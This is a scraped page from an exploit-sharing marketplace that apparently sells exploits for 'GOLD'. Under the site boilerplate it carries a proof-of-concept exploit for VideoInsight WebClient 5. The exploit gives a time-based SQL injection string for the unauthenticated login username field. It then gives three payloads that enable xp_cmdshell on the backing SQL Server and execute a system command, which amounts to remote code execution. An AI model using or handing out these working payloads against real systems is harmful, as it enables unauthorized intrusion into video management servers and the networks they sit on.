0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
VideoInsight WebClient 5 - SQL Injection Vulnerability
# Title: VideoInsight WebClient 5 - SQL Injection # Author: vosec # Vendor Homepage: https://www.security.us.panasonic.com/ # Software Link: https://www.security.us.panasonic.com/video-management-software/web-client/ # Version: 5 # Tested on: Windows Server 2008 R2 # CVE: N/A # Description: # This exploit is based on CVE-2017-5151 targeting versions prior. # The txtUserName and possibly txtPassword field contain an unauthenticated SQL injection vulnerability # that can be used for remote code execution. # SQL Injection - PoC # From the web login page submit the following string as the username with anything in the password field. # The web server will hang for 5 seconds: UyYr');WAITFOR DELAY '00:00:05'-- # Remote Code Execution - PoC # From the web login page submit each of the following strings as the username, one at a time, with anything # in the password field (with the ping, use a valid IP address that you can monitor): UyYr');EXEC sp_configure 'show advanced options', 1;RECONFIGURE;-- UyYr');EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- UyYr');EXEC xp_cmdshell 'ping xxx.xxx.xxx.xxx';-- # 0day.today [2024-12-25] #